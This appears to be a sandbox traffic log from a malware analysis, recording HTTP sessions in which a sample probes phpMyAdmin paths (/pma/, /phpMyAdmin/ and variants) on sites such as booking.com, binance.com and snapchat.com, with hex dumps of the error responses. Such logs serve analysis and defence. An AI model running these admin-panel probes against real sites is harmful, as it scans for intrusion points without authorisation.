                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 67 69 6e 2d 74 6f 70 3a 34 72 65 6d 7d 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 77 69 64 74 68 3a 31 2e 35 72 65 6d 3b 68 65 69 67 68 74 3a 31 2e 35 72 65 6d 7d 7d 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 2c 2e 66 6f 6f 74 65 72 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 2e 35 72 65 6d 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 6c 69 6e 65 2d 68 65 69 67
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: gin-top:4rem}.heading-favicon{width:1.5rem;height:1.5rem}}.main-content,.footer{padding-right:1.5rem;padding-left:1.5rem}.main-wrapper{display:flex;flex:1;flex-direction:column;align-items:center}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{line-heig
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: mage:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGEx
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 2e 35 72 65 6d 7d 2e 66 6f 6f 74 65 72 20 2e 72 61 79 2d 69 64 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 63 6f 64 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 61 63 6f 2c 63 6f 75 72 69 65 72 2c 6d 6f 6e 6f 73 70 61 63 65 7d 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6f 76 65 72 66 6c 6f 77 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 64 69 61 67 6e 6f 73 74 69 63 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 64 69 73 70 6c 61 79 3a 69
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: .5rem}.footer .ray-id{text-align:center;code{font-family:monaco,courier,monospace}}.core-msg,.zone-name-title{overflow-wrap:break-word}@media (width <= 720px){.diagnostic-wrapper{display:flex;flex-wrap:wrap;justify-content:center}.clearfix:after{display:i
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 6d 6f 6a 61 64 6f 76 65 72 61 2e 73 6b 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 31 37 30 39 37 27 2c 63 52 61 79 3a 20 27 38 35 30 61 62 64 35 65 30 62 35 64 36 37 36 31 27 2c 63 48 61 73 68 3a 20 27 36 31 65 63 65 36 33 62 34 66 39 38 36 30 39 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 70 68 70 4d 79 41 64 6d 69 6e 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 79 74 73 4a 42 4d 36 6e 78 4d 39 76 56 2e 30 6e 78 53 74 61 64 42 6a 6f 56 58 50 4c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: div></div></noscript></div></div><script>(function(){window._cf_chl_opt={cvId: '3',cZone: "mojadovera.sk",cType: 'managed',cNounce: '17097',cRay: '850abd5e0b5d6761',cHash: '61ece63b4f98609',cUPMDTk: "\/phpMyAdmin\/?__cf_chl_tk=ytsJBM6nxM9vV.0nxStadBjoVXPL
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 46 59 6f 77 79 49 34 51 34 6a 67 68 4e 68 7a 74 35 70 39 45 43 56 4b 33 41 71 77 76 72 56 4e 48 66 65 34 77 48 54 77 56 70 47 71 79 4e 50 47 71 6b 4e 51 71 4c 71 68 46 55 61 6b 75 2d 55 6c 65 54 46 59 71 74 64 30 78 45 68 52 38 44 75 58 6f 4a 55 4c 30 41 4f 59 4a 64 39 6a 44 4e 30 6e 56 43 68 78 5f 6b 38 6c 34 47 2d 30 6f 79 55 68 71 7a 57 70 66 57 76 56 55 51 68 78 66 36 59 45 5a 6d 50 62 30 54 6f 73 44 39 6c 71 38 70 75 54 6e 61 57 30 42 76 73 51 6c 64 4d 33 6c 31 4e 31 62 4f 33 55 30 41 5f 66 73 6d 4f 62 33 53 58 56 47 64 48 70 78 53 44 6d 36 39 4a 51 70 41 45 41 75 51 66 71 45 47 79 67 69 4c 43 35 34 77 5f 53 34 62 48 31 62 43 37 54 64 7a 37 2d 73 30 78 59 41 38 51 4b 68 69 6c 73 70 70 49 36 37 41 53 4c 6b 39 4b 35 35 48 62 36 43 6a 43 73 42 4d 68 6e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: FYowyI4Q4jghNhzt5p9ECVK3AqwvrVNHfe4wHTwVpGqyNPGqkNQqLqhFUaku-UleTFYqtd0xEhR8DuXoJUL0AOYJd9jDN0nVChx_k8l4G-0oyUhqzWpfWvVUQhxf6YEZmPb0TosD9lq8puTnaW0BvsQldM3l1N1bO3U0A_fsmOb3SXVGdHpxSDm69JQpAEAuQfqEGygiLC54w_S4bH1bC7Tdz7-s0xYA8QKhilsppI67ASLk9K55Hb6CjCsBMhn
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 7a 54 56 74 45 37 70 58 6a 73 45 76 52 56 75 35 6b 39 2d 5a 35 53 69 72 4b 45 70 46 2d 46 4f 74 34 36 6f 55 67 47 44 59 67 72 6a 47 4d 34 71 65 6b 75 4b 30 39 38 46 71 62 6d 53 33 6d 71 54 4e 32 58 39 39 4c 48 7a 45 49 58 6e 4b 43 73 6f 35 5f 42 37 59 55 78 48 35 38 68 6d 31 79 4d 6b 55 65 39 65 30 48 6f 58 4f 36 71 45 6e 68 47 4f 50 32 6a 4e 51 36 48 68 53 70 64 55 49 72 57 4b 39 74 65 37 67 61 54 4c 31 39 6c 55 54 31 49 35 7a 6f 38 7a 37 50 70 4d 71 6a 42 63 54 73 37 78 46 6f 4c 73 73 47 47 44 62 58 44 57 47 78 33 4f 55 71 79 58 51 39 56 69 41 69 4d 4b 79 62 6b 33 59 6f 72 30 30 34 38 6e 46 4f 4a 7a 41 79 31 4b 71 69 70 44 72 47 63 6a 53 53 32 5f 35 38 66 62 2d 48 6b 58 54 77 69 6c 71 41 30 67 72 35 67 49 68 31 72 4e 41 58 4b 77 48 31 58 31 4b 63 41 48
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: zTVtE7pXjsEvRVu5k9-Z5SirKEpF-FOt46oUgGDYgrjGM4qekuK098FqbmS3mqTN2X99LHzEIXnKCso5_B7YUxH58hm1yMkUe9e0HoXO6qEnhGOP2jNQ6HhSpdUIrWK9te7gaTL19lUT1I5zo8z7PpMqjBcTs7xFoLssGGDbXDWGx3OUqyXQ9ViAiMKybk3Yor0048nFOJzAy1KqipDrGcjSS2_58fb-HkXTwilqA0gr5gIh1rNAXKwH1X1KcAH
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 34 39 78 69 46 4f 7a 65 6c 39 64 74 54 39 42 42 38 4c 64 71 78 51 42 31 46 44 32 35 6c 6c 54 42 61 6d 37 78 2d 56 75 36 6c 69 59 39 34 7a 43 6f 54 65 78 44 2d 4e 56 61 54 32 4e 6f 44 64 50 6f 4c 6b 36 6c 49 48 31 46 58 37 33 66 54 73 4c 5f 35 4e 6d 6a 62 30 2d 6d 5f 74 51 4e 6b 31 44 34 50 48 75 68 2d 4f 47 4b 66 63 68 56 4d 53 6e 6b 42 6e 44 44 33 34 66 55 6c 76 51 52 2d 48 5a 6c 75 6e 6f 66 68 4d 43 4f 6b 57 73 58 68 6b 37 7a 38 4e 38 66 4f 57 4e 68 69 76 6f 37 64 74 77 59 38 6c 5f 37 54 59 6d 76 70 54 2d 59 41 55 69 65 38 55 5a 71 4e 4d 76 43 69 62 4f 43 53 74 37 42 6b 75 44 37 70 51 48 22 2c 63 52 71 3a 20 7b 72 75 3a 20 27 61 48 52 30 63 48 4d 36 4c 79 39 74 62 32 70 68 5a 47 39 32 5a 58 4a 68 4c 6e 4e 72 4c 33 42 6f 63 45 31 35 51 57 52 74 61 57 34
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 49xiFOzel9dtT9BB8LdqxQB1FD25llTBam7x-Vu6liY94zCoTexD-NVaT2NoDdPoLk6lIH1FX73fTsL_5Nmjb0-m_tQNk1D4PHuh-OGKfchVMSnkBnDD34fUlvQR-HZlunofhMCOkWsXhk7z8N8fOWNhivo7dtwY8l_7TYmvpT-YAUie8UZqNMvCibOCSt7BkuD7pQH",cRq: {ru: 'aHR0cHM6Ly9tb2phZG92ZXJhLnNrL3BocE15QWRtaW4


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                163192.168.2.66348744.233.131.115443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC174OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: cloud.simplify3d.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC216INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, private
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 6854
                                                                                                                                                                                                                                                                                                                                                                Connection: Close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC6854INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Page Not Found</title><meta name="description" co


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                164192.168.2.6634143.161.150.69443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC180OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: account.booking.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC2006INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                server: envoy
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: frame-ancestors https://*.booking.com 'self'; report-uri https://nellie.booking.com/csp-report-uri?type=block&tag=212&pid=226c4f3d552000f1&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgX8c1xrgbYjEjhmvgRFMYCytVNxLTDudX19W6VDmrB7p
                                                                                                                                                                                                                                                                                                                                                                content-security-policy-report-only: base-uri 'none'; connect-src saa.booking.com secure.booking.com reports.booking.com privacyportal-eu.onetrust.com geolocation.onetrust.com cdn.cookielaw.org www.google-analytics.com *.perimeterx.net *.pxchk.net *.px-cdn.net *.px-client.net *.px-cloud.net 'self' 'report-sample'; default-src *.bstatic.com bstatic.com 'self'; frame-src https://www.youtube.com/embed/Vv4w5SmRkss *.bstatic.com https://www.google.com bstatic.com www.booking.com secure.booking.com paymentcomponent.booking.com 'self'; img-src 'self' data: www.booking.com graph.facebook.com cdn.cookielaw.org account.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google-analytics.com www.google.com stats.g.doubleclick.net *.px-cloud.net *.perimeterx.net www.gstatic.com; object-src 'none'; report-uri https://nellie.booking.com/csp-report-uri?type=report&tag=213&pid=226c4f3d552000f1&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgX8c1xrgbYjEjhmvgRFMYCytVNxLTDudX19W6VDmrB7p; script-src saa.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google.com www.google-analytics.com cdn.cookielaw.org geolocation.onetrust.com 'self' 'nonce-4FoQJYptw226Jz9' 'report-sample'; style-src *.bstatic.com bstatic.com *.static.booking.cn 'self' 'unsafe-inline'
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=86400; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Error from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 7e1e27db89c10c5d284149b3df2ae272.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P5
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: ntyc4_WfB32n94q2xE1WWrnDUQXu-X2wHxszpzuKHWFbC5Kf3wVdHg==
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC14378INData Raw: 35 35 62 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 55b8<!DOCTYPE html><html><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><title>Not Found</title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC7574INData Raw: 74 6f 72 69 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 74 66 22 2c 22 70 72 65 66 69 78 22 3a 22 2b 33 33 22 7d 2c 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 74 67 22 2c 22 6e 61 6d 65 22 3a 22 54 6f 67 6f 22 2c 22 70 72 65 66 69 78 22 3a 22 2b 32 32 38 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 54 68 61 69 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 74 68 22 2c 22 70 72 65 66 69 78 22 3a 22 2b 36 36 22 7d 2c 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 74 6a 22 2c 22 6e 61 6d 65 22 3a 22 54 61 6a 69 6b 69 73 74 61 6e 22 2c 22 70 72 65 66 69 78 22 3a 22 2b 39 39 32 22 7d 2c 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 74 6b 22 2c 22 6e 61 6d 65 22 3a 22 54 6f 6b 65 6c 61 75 22 2c 22 70 72 65 66 69 78 22
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: tories","country_code":"tf","prefix":"+33"},{"country_code":"tg","name":"Togo","prefix":"+228"},{"name":"Thailand","country_code":"th","prefix":"+66"},{"country_code":"tj","name":"Tajikistan","prefix":"+992"},{"country_code":"tk","name":"Tokelau","prefix"
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                165192.168.2.6633923.161.136.2443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC181OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.binance.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC701INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 66
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Tuser
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.binance.com/en/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                X-Gateway: traefik
                                                                                                                                                                                                                                                                                                                                                                X-Trace-Id: de2bd4f3a1784961be6643bef4eee14a
                                                                                                                                                                                                                                                                                                                                                                X-Traefik-Duration: 0.00
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 8f7f25a8ec7b36657c310241b9ad397e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P4
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: 7NdhFscoXlKgFxJtpnuSHDZosrS98KOE2mxyuP3mkaRXsMbgZOaJPQ==
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC66INData Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 63 63 6f 75 6e 74 73 2e 62 69 6e 61 6e 63 65 2e 63 6f 6d 2f 65 6e 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <a href="https://accounts.binance.com/en/phpmyadmin/">Found</a>.


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                166192.168.2.66344934.149.46.130443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC182OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.snapchat.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC5706INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                set-cookie: sc-wcid=4d4d0a93-e2f4-414f-b79d-51d5c62a9c21; Path=/; Domain=.snapchat.com; Expires=Tue, 06-Feb-2024 11:16:10 GMT; Max-Age=86400; Secure
                                                                                                                                                                                                                                                                                                                                                                expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubdomains
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: allow-from https://iframe.arkoselabs.com
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;
